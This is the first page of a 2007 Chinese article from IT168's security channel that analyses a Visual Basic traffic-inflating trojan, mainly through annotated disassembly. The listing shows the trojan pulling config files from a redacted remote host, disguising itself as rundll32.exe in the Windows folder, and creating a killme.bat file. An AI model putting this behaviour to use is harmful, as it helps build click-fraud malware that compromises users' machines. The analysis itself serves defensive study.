网络安全 频道
IT168首页 > 网络安全 > 网络安全应用 > 正文

对一刷网站访问量的小马分析

作者:混世魔王 编辑: 李莲 2007-06-12 21:57
分享

系统补丁打完,网上瞎灌,居然还中网马,哎!现在把他网马下载下来,不错,真牛,通杀Windwos98、WindwosNT、Windwos2000、WindwosXP、WindwosXPSP2、Windwos2003。自己留着,随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。

脱壳略,VB编写。

00403DAD   . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>;

msvbvm60.__vbaHresultCheckObj

00403DB3   . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX

00403DB9   . EB 0A       JMP SHORT Rundll32.00403DC5

00403DBB   > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0

00403DC5   > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]

00403DCB   . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX

00403DD1   . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0

00403DDB   . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]

00403DE1   . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX

00403DE7   . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8

00403DF1   . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]

00403DF7   . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]

00403DFD   . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove

00403E03   . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6

00403E0A   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"

00403E14   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E1E   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E24   . 8D4D A0     LEA ECX,DWORD PTR SS:[EBP-60]

00403E27   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E2D   . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7

00403E34   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"

00403E3E   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E48   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E4E   . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]

00403E54   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E5A   . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8

00403E61   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"

00403E6B   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E75   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E7B   . 8D4D 8C     LEA ECX,DWORD PTR SS:[EBP-74]

00403E7E   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E84   . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9

00403E8B   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"

00403E95   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E9F   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EA5   . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]

00403EAB   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EB1   . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A

00403EB8   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"

00403EC2   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403ECC   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403ED2   . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]

00403ED8   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EDE   . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B

00403EE5   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"

00403EEF   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403EF9   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EFF   . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F05   . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup

00403F0B   . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F11   . 51         PUSH ECX

00403F12   . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]

00403F18   . 52         PUSH EDX

00403F19   . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar

00403F1F   . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"

00403F29   . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8

程序会到http://www.xxxxxxxx.com 的tc文件读取配置文件,同时访问tc/MMResult.asp,生成文件 

00404DA2   . /EB 0A       JMP SHORT Rundll32.00404DAE           //获取文件路径堆栈 

00404DA4   > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0       

00404DAE   > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0]         //我程序路径是 "D:\fuck you" 

00404DB4   . 50         PUSH EAX                         //路径入eax   

00404DB5   . 68 80274000   PUSH Rundll32.00402780             ; //生成killme.bat

00404DBA   . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404DC0   . 8BD0       MOV EDX,EAX                 //文件路径+文件名字D:\fuck you\killme.bat

00404DC2   . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404DC8   . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404DCE   . 50         PUSH EAX

00404DCF   . 6A 01       PUSH 1

00404DD1   . 6A FF       PUSH -1

00404DD3   . 6A 02       PUSH 2
0
123查看全文
第1页:对一刷网站访问量的小马分析第2页:对一刷网站访问量的小马分析第3页:对一刷网站访问量的小马分析
相关文章
    盛拓传媒简介 关于IT168 广告服务 使用条款 投稿指南 联系我们
    北京盛拓优讯信息技术有限公司. 版权所有 中华人民共和国增值电信业务经营许可证 编号:京B2-20170206 北京市公安局海淀分局网监中心备案编号:11010802020118
    广播电视节目制作经营许可证:(京) 字第07177号 信息系统安全等级保护备案:11010813655-00001 测绘资质证书:乙测资字11005067 网络文化经营许可证:京网文(2018) 1456-138号
    违法和不良信息举报电话 :010-59548436,010-59544810,17352615267,17816876620,niuxiaotong@pcpop.com,jiachanjuan@126.com